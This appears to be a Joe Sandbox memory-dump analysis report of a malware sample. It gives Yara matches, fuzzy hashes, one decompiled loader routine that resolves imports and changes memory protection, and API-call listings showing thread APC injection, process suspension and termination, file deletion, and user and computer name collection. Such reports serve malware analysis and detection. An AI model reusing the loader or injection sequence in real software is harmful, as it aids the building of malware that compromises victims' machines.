Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 330d8c9bbe7782f1d4226a68fc55430f8979234e14aefa9f5e0b94f7502a828f
Instruction ID: 32ab4abc8411b1c1f8c21384b23d3e9e2e339560ee5f6e4cf650faa5d925a009
Opcode Fuzzy Hash: 330d8c9bbe7782f1d4226a68fc55430f8979234e14aefa9f5e0b94f7502a828f
Instruction Fuzzy Hash: 4BB01231040100FBEE018B10ED08F057A22A750B40F00C011B24C00070863945A4FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F49 Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401F49(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x404180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x69b24f45 &  !( *0x404180 - 0x69b24f45);
				_t18 = E00401B3C( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x69b24f45 &  !( *0x404180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x69b24f45 &  !( *0x404180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401546(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401000(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E0040133C(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401E0B(_t42);
					L8:
					return _t29;
				}
			}

0x00401f51
0x00401f53
0x00401f6f
0x00401f80
0x00401f87
0x00401fe5
0x00000000
0x00401f89
0x00401f89
0x00401f93
0x00401f97
0x00401f9c
0x00401f9f
0x00401fa4
0x00401fa8
0x00401fad
0x00401fb2
0x00401fb6
0x00401fbb
0x00401fbc
0x00401fc0
0x00401fc5
0x00401fcd
0x00401fcd
0x00401fc5
0x00401fb6
0x00401fa8
0x00401fcf
0x00401fd8
0x00401fdc
0x00401fe6
0x00401fec
0x00401fec

APIs

Part of subcall function 00401B3C: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401F85,?,?,?,?,?,00000002,?,?), ref: 00401B60
Part of subcall function 00401B3C: GetProcAddress.KERNEL32(00000000,?), ref: 00401B82
Part of subcall function 00401B3C: GetProcAddress.KERNEL32(00000000,?), ref: 00401B98
Part of subcall function 00401B3C: GetProcAddress.KERNEL32(00000000,?), ref: 00401BAE
Part of subcall function 00401B3C: GetProcAddress.KERNEL32(00000000,?), ref: 00401BC4
Part of subcall function 00401B3C: GetProcAddress.KERNEL32(00000000,?), ref: 00401BDA

Part of subcall function 00401000: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038

Part of subcall function 0040133C: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401375
Part of subcall function 0040133C: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 004013EA
Part of subcall function 0040133C: GetLastError.KERNEL32 ref: 004013F0

GetLastError.KERNEL32(?,?), ref: 00401FC7

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
String ID:
API String ID: 3135819546-0
Opcode ID: 7721fd1d578fd7fc797eb9b784c495ec4781f0c3728edd8146b48ba72b207c30
Instruction ID: 071a28c756b52ad22c3596f5fc4463bbeeeb174c7e53a62a49ff57e67b02f435
Opcode Fuzzy Hash: 7721fd1d578fd7fc797eb9b784c495ec4781f0c3728edd8146b48ba72b207c30
Instruction Fuzzy Hash: C9110B36600606ABD721AA958C80DAFB7FDAF88318700053EFA01B7651EB74ED058794

Uniqueness

Uniqueness Score: -1.00%

Function 0075C304 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0075DCFB: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,00000001,00000000,00000000,?,74715520,00000000,?,?,?,0075508A,?), ref: 0075DD33
Part of subcall function 0075DCFB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0075DD47
Part of subcall function 0075DCFB: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00000001,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD61
Part of subcall function 0075DCFB: RegCloseKey.KERNEL32(?,?,?,?,0075508A,?,?,?,?,?,00000001), ref: 0075DD8B

HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0075C396

Part of subcall function 00753B26: memcpy.NTDLL(?,?,00000000,?,?,?,00000000), ref: 00753B49

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID:
API String ID: 1301464996-0
Opcode ID: 8613d37e0dd75ff593c25ec819da3535017b640177f5e41ece3ccb8027d6a214
Instruction ID: efd964c057193b199f2fcc26d082e2649305ff7ad5453f536eb13ac0cc4e0054
Opcode Fuzzy Hash: 8613d37e0dd75ff593c25ec819da3535017b640177f5e41ece3ccb8027d6a214
Instruction Fuzzy Hash: C4112371600309EFEB569F58DC84FEE77A8EB48342F108069FD069B251DBF89D488B52

Uniqueness

Uniqueness Score: -1.00%

Function 0076E4F0 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0076E4FA

Part of subcall function 0076144E: RegOpenKeyExA.KERNEL32(0076E512,00000000,00000000,00020119,80000001,00000000,?,00000000,?,0076E512,80000001,?,00000000,?,?,0075DA8B), ref: 00761495
Part of subcall function 0076144E: RegOpenKeyExA.ADVAPI32(0076E512,0076E512,00000000,00020019,80000001,?,0076E512,80000001,?,00000000,?,?,0075DA8B,?,?,?), ref: 007614AB
Part of subcall function 0076144E: RegCloseKey.ADVAPI32(80000001,80000001,?,00000000,00000010,?,0076E512,80000001,?,00000000,?,?,0075DA8B,?,?,?), ref: 007614F4

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: c7fc98608012708986813ba422514ecade61ee74f31daa503c10e97321f7cb2e
Instruction ID: 44198f2d524b7632abb30e10a6498030b4d7b9e66bbb1d5e3d6498e2055252ae
Opcode Fuzzy Hash: c7fc98608012708986813ba422514ecade61ee74f31daa503c10e97321f7cb2e
Instruction Fuzzy Hash: BAE0EC35240108FBDB10EE55DC46F997B59DB14754F00C025FE0A6B242EA75EA648691

Uniqueness

Uniqueness Score: -1.00%

Function 00758737 Relevance: 1.3, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,007740F0,0000002C,0076A36A,03F08DF2,?,00000000,0076FB31,?,00000318), ref: 00758751

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4e753a548a2bc524f2218825b02d8aa46ea9502c7938523c042197860ff3061b
Instruction ID: 46be7a2bc421fbcd48716bf21339c0e7682d4906e20d12a0611433fba2ee527b
Opcode Fuzzy Hash: 4e753a548a2bc524f2218825b02d8aa46ea9502c7938523c042197860ff3061b
Instruction Fuzzy Hash: B3D01730E00619DBCB219B94EC8AA9EFB71BF08750F60C224F964771A0C6341916CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00761577 Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

Part of subcall function 00751474: ExpandEnvironmentStringsW.KERNEL32(00751CD4,00000000,00000000,00000001,00000000,00000000,00000000,00751CD4,00000000,00000000,-00000007,00760969,-00000007,?,?), ref: 0075148B
Part of subcall function 00751474: ExpandEnvironmentStringsW.KERNEL32(00751CD4,00000000,00000000,00000000), ref: 007514A5

lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615C3
lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615CF
memset.NTDLL ref: 00761617
FindFirstFileW.KERNEL32(00000000,00000000), ref: 00761632
lstrlenW.KERNEL32(0000002C), ref: 0076166A
lstrlenW.KERNEL32(?), ref: 00761672
memset.NTDLL ref: 00761695
wcscpy.NTDLL ref: 007616A7
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 007616CD
RtlEnterCriticalSection.NTDLL(?), ref: 00761703

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

RtlLeaveCriticalSection.NTDLL(?), ref: 0076171F
FindNextFileW.KERNEL32(?,00000000), ref: 00761738
WaitForSingleObject.KERNEL32(00000000), ref: 0076174A
FindClose.KERNEL32(?), ref: 0076175F
FindFirstFileW.KERNEL32(00000000,00000000), ref: 00761773
lstrlenW.KERNEL32(0000002C), ref: 00761795
FindNextFileW.KERNEL32(?,00000000), ref: 0076180B
WaitForSingleObject.KERNEL32(00000000), ref: 0076181D
FindClose.KERNEL32(?), ref: 00761838

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID:
API String ID: 2962561936-0
Opcode ID: 1670a928be7e7197bd743a8a004f6db3ce90b11b67166c524373f02ca315901a
Instruction ID: 1d82afc8ce399e16df08a10f68a6416702fca9ca7e756e86c8f1e1bfd01a14ae
Opcode Fuzzy Hash: 1670a928be7e7197bd743a8a004f6db3ce90b11b67166c524373f02ca315901a
Instruction Fuzzy Hash: 96817B71504345AFC750EF64DC88A1BBBE9FF88340F488829F89A97162DB78D945CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00767702 Relevance: 18.5, APIs: 12, Instructions: 488memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 0076773A
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 0076776C
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 0076779E
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 007677D0
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 00767802
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 00767834
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 00767866
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 00767898
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 007678CA
HeapFree.KERNEL32(00000000,?,?,?,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 00767A59

Part of subcall function 0076476C: RtlEnterCriticalSection.NTDLL(03F0C2D0), ref: 00764775
Part of subcall function 0076476C: HeapFree.KERNEL32(00000000,?,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 007647A7
Part of subcall function 0076476C: RtlLeaveCriticalSection.NTDLL(03F0C2D0), ref: 007647C5

HeapFree.KERNEL32(00000000,007691EF,?,007691EF,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 00767A9D
StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,007691EF,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 00767AEF

Part of subcall function 00764721: lstrlen.KERNEL32(npw,03F0C314,0077706E,00000000,0076EF9E), ref: 0076472A
Part of subcall function 00764721: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0076474D
Part of subcall function 00764721: memset.NTDLL ref: 0076475C

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavelstrlenmemcpymemset
String ID:
API String ID: 2064646876-0
Opcode ID: 787270a84e1b1b9d58004478fce6b524f00bda2e17fd9f9e95200fcc7be5ee7d
Instruction ID: 8a96652f3abb14f0fc38c672b1819f8a70f76dc2d6606295852d570a625ea397
Opcode Fuzzy Hash: 787270a84e1b1b9d58004478fce6b524f00bda2e17fd9f9e95200fcc7be5ee7d
Instruction Fuzzy Hash: 08F1C670A18516EFDB55EBB8CC48D2F32E9AB487C47658925AC0BDB200EE3CDD41C756

Uniqueness

Uniqueness Score: -1.00%

Function 00768664 Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 00768698
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 007686A4
RtlAllocateHeap.NTDLL(00000000,?), ref: 007686B5
memset.NTDLL ref: 007686D2
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 007686E0
WaitForSingleObject.KERNEL32(00000000), ref: 007686EE
GetDriveTypeW.KERNEL32(?), ref: 007686FC
lstrlenW.KERNEL32(?), ref: 00768708
wcscpy.NTDLL ref: 0076871A
lstrlenW.KERNEL32(?), ref: 00768734
HeapFree.KERNEL32(00000000,?), ref: 0076874D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID:
API String ID: 3888849384-0
Opcode ID: b93b9e3338240f5fc8bc8eac9587f9683b1478c556e2ecccf1bdd583eb70527f
Instruction ID: 60de0762fa5089e91ca98c1fae7c719fb1548e7c764783fc2591c676f3c2a0c2
Opcode Fuzzy Hash: b93b9e3338240f5fc8bc8eac9587f9683b1478c556e2ecccf1bdd583eb70527f
Instruction Fuzzy Hash: F0312F7290010CFFDB019BA4EC88CEEBBBDEF04394B108466F506E2121DB399E45DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0076FD17 Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,7476F5B0,0075AE6D,?,00000000,?,?,0075DA8B,?), ref: 0076FD3D
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0076FD49
GetModuleHandleA.KERNEL32(?,03F09713,?,00000000,00000000), ref: 0076FD69
GetProcAddress.KERNEL32(00000000), ref: 0076FD70
Thread32First.KERNEL32(00000000,0000001C), ref: 0076FD80
OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 0076FD9B
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 0076FDAC
CloseHandle.KERNEL32(00000000), ref: 0076FDB3
Thread32Next.KERNEL32(00000000,0000001C), ref: 0076FDBC
CloseHandle.KERNEL32(00000000), ref: 0076FDC8

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID:
API String ID: 2341152533-0
Opcode ID: 203354544a25915580f9e8e2c2b25748b703c0eb54f22974f253dc5b101c86e2
Instruction ID: 2eebc2f4be64b675e9d9e3abe6b61f87a6530dd52624c04fc8eaf5942406a5fc
Opcode Fuzzy Hash: 203354544a25915580f9e8e2c2b25748b703c0eb54f22974f253dc5b101c86e2
Instruction Fuzzy Hash: 48215E7260011CFFDF019FA4DC88DEE7B79EB09395B10812AFA05A6160DB389E859B65

Uniqueness

Uniqueness Score: -1.00%

Function 00752299 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 007522B1

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0075231A
lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 00752342
RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 00752394
DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0075239F
FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 007523B2

Strings

v, xrefs: 00752394

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID: v
API String ID: 499515686-1801730948
Opcode ID: 04d787dd99a420847f91955386e271a1d7c963352ebfd4b5784feea0103f0db7
Instruction ID: 6a5ffd73b4c4b29ca82b5c24c0d75c4c0292d8e0b95c19b7989a1b59fc40e4d5
Opcode Fuzzy Hash: 04d787dd99a420847f91955386e271a1d7c963352ebfd4b5784feea0103f0db7
Instruction Fuzzy Hash: EC416E7180020DEFDF019FA0DC49AED7BB9FF05346F108065E910A6162DBBC9B89EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0076411F Relevance: 13.6, APIs: 9, Instructions: 117librarynativeloaderCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,?,?,?,69B25F44,00000000,?,00000000,?,?), ref: 0076414C
GetLastError.KERNEL32 ref: 0076415A
NtSetInformationProcess.NTDLL ref: 007641AA
GetProcAddress.KERNEL32(?,00000000), ref: 007641EF
CloseHandle.KERNEL32(?), ref: 00764271

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Process$AddressCloseErrorHandleInformationLastOpenProc
String ID:
API String ID: 1788740162-0
Opcode ID: 9e1fc2d1aac0228bcf70c48cc96c43957d47b9f34ab36e8a6cd958f62f01514e
Instruction ID: 510f10cbce7b404e7fab47400ed36bbb34dea09d6732b1a6848c7c2f4144be9f
Opcode Fuzzy Hash: 9e1fc2d1aac0228bcf70c48cc96c43957d47b9f34ab36e8a6cd958f62f01514e
Instruction Fuzzy Hash: D141C331508309EFD711AF64DC48B6ABBE8BB95794F108529FD8AA2160D77CCD84CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0075154D Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00756A99: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,00000000,?,0075158A), ref: 00756AAA
Part of subcall function 00756A99: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,0075158A), ref: 00756AC7

FreeLibrary.KERNEL32(?), ref: 00751683

Part of subcall function 00767CC5: lstrlenW.KERNEL32(?,00000000,?,?,?,007515C8,?,?), ref: 00767CD2
Part of subcall function 00767CC5: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,007515C8,?,?), ref: 00767CFB
Part of subcall function 00767CC5: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 00767D1B
Part of subcall function 00767CC5: lstrcpyW.KERNEL32(-00000002,?), ref: 00767D37
Part of subcall function 00767CC5: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,007515C8,?,?), ref: 00767D43
Part of subcall function 00767CC5: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,007515C8,?,?), ref: 00767D46
Part of subcall function 00767CC5: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,007515C8,?,?), ref: 00767D52
Part of subcall function 00767CC5: GetProcAddress.KERNEL32(00000000,?), ref: 00767D6F
Part of subcall function 00767CC5: GetProcAddress.KERNEL32(00000000,?), ref: 00767D89
Part of subcall function 00767CC5: GetProcAddress.KERNEL32(00000000,?), ref: 00767D9F
Part of subcall function 00767CC5: GetProcAddress.KERNEL32(00000000,?), ref: 00767DB5
Part of subcall function 00767CC5: GetProcAddress.KERNEL32(00000000,?), ref: 00767DCB
Part of subcall function 00767CC5: GetProcAddress.KERNEL32(00000000,?), ref: 00767DE1

FindFirstFileW.KERNEL32(?,?,?,?), ref: 007515D9
lstrlenW.KERNEL32(?), ref: 007515F5
lstrlenW.KERNEL32(?), ref: 0075160D

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

lstrcpyW.KERNEL32(00000000,?), ref: 00751626
lstrcpyW.KERNEL32(00000002), ref: 0075163B

Part of subcall function 00760443: lstrlenW.KERNEL32(?,00000000,74758250,747169A0,?,?,?,0075164B,?,00000000,?), ref: 00760453
Part of subcall function 00760443: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0075164B,?,00000000,?), ref: 00760475
Part of subcall function 00760443: lstrcpyW.KERNEL32(00000000,?), ref: 007604A1
Part of subcall function 00760443: lstrcatW.KERNEL32(00000000,?), ref: 007604B4

FindNextFileW.KERNEL32(?,00000010), ref: 00751663
FindClose.KERNEL32(00000002), ref: 00751671

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
String ID:
API String ID: 1209511739-0
Opcode ID: 98ba3feebe0cea7416b41605f7ab39d6a697c2b22c9fd8d078615e1d8b9cf606
Instruction ID: 5e9dc4a3e62bdabeb959c17d391a93feae9cfb58aad6ddf9d33640c29198b636
Opcode Fuzzy Hash: 98ba3feebe0cea7416b41605f7ab39d6a697c2b22c9fd8d078615e1d8b9cf606
Instruction Fuzzy Hash: AB41BF71008306DFC701DF60DC48A6FBBE9FB88746F48492DF89892160DB78DA48CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0076B568 Relevance: 12.1, APIs: 8, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 0076B592
RtlAllocateHeap.NTDLL(00000000,?), ref: 0076B5A5
GetUserNameW.ADVAPI32(00000000,?), ref: 0076B5B7
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0076332D), ref: 0076B5DB
GetComputerNameW.KERNEL32(00000000,?), ref: 0076B5E9
RtlAllocateHeap.NTDLL(00000000,?), ref: 0076B600
GetComputerNameW.KERNEL32(00000000,?), ref: 0076B611
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0076332D), ref: 0076B637

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 71db81b6cd7f33dc18eafcbb9068e679c45fd182c34a138296ffc35c5e8bb829
Instruction ID: 2e89e4afc7bd42696bda658e667cbdf380cc3f7fa44c7be33f85536331d1c974
Opcode Fuzzy Hash: 71db81b6cd7f33dc18eafcbb9068e679c45fd182c34a138296ffc35c5e8bb829
Instruction Fuzzy Hash: 30310AB6A00209EFDB00DFB4DD898AEBBFAFB443407108469E906D3210DB38DE85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0075BDCE Relevance: 10.6, APIs: 7, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000E3B,00000000,?), ref: 0075BDFC

Part of subcall function 00758845: GetModuleHandleA.KERNEL32(?,03F0A2DE), ref: 00758873
Part of subcall function 00758845: GetProcAddress.KERNEL32(00000000), ref: 0075887A
Part of subcall function 00758845: _strupr.NTDLL ref: 007588E8
Part of subcall function 00758845: lstrlen.KERNEL32(00000000,?,00000000,?,00000103), ref: 007588F0

TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 0075BE3F
NtSuspendProcess.NTDLL(00000000), ref: 0075BE5D
OpenProcess.KERNEL32(00000418,00000000,00000000), ref: 0075BE7E
CloseHandle.KERNEL32(00000000), ref: 0075BE92
NtResumeProcess.NTDLL(00000000), ref: 0075BEAF

Part of subcall function 0076411F: OpenProcess.KERNEL32(001F0FFF,?,?,?,69B25F44,00000000,?,00000000,?,?), ref: 0076414C
Part of subcall function 0076411F: GetLastError.KERNEL32 ref: 0076415A

CloseHandle.KERNEL32(00000000), ref: 0075BEB6

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Process$HandleOpen$Close$AddressErrorLastModuleProcResumeSuspendTerminate_struprlstrlen
String ID:
API String ID: 1091893014-0
Opcode ID: 35cba0f51daeda54f000ec4d95348e9b0dfb069e96843f9702d123fbeb32ba35
Instruction ID: 2d93bc8ab7332143c5633a3cea77abe2a4d94477505c3feed99ec4c08e7c9e1a
Opcode Fuzzy Hash: 35cba0f51daeda54f000ec4d95348e9b0dfb069e96843f9702d123fbeb32ba35
Instruction Fuzzy Hash: 7C21E272500209ABCB209B64DC8AAFE37ADFB04352F184515FE15D2151DBB8DD888BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0075624E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114stringnativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 007562A4
lstrlenW.KERNEL32(?), ref: 007562B2
NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 007562DD
lstrcpyW.KERNEL32(00000006,00000000), ref: 0075630B

Strings

a"w, xrefs: 00756284

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

